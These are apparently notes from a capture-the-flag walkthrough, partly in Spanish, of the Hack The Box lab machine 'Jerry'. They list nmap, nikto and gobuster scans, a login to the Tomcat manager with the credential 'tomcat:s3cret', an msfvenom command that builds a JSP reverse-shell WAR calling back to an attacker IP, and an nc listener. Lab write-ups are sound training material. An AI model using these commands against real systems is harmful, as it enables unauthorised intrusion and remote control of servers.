nmap -A -p- -oA output 10.129.154.189 --min-rate=10000 --script=vuln --script-timeout=15 -v

![[Pasted image 20210519134806.png]]

nmap -sC -sV -O -p- -oA jerry 10.129.154.189

nmap -sU -O -p- -oA jerry-udp 10.129.154.189

nikto -h 10.129.154.189:80

gobuster dir -k -u http://10.129.154.189:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210519132902.png

Le damos click en manager app

Pasted image 20210519133017.png

tomcat:s3cret

Pasted image 20210519133103.png


msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.116 LPORT=5555 -f war > jerry_reverse_shell.war

Subimos el war con el payload para un reverse shell

Pasted image 20210519133658.png

nc -lvnp 5555

Pasted image 20210519134442.png

boxes

copyright©2022 Cu3rv0x all rights reserved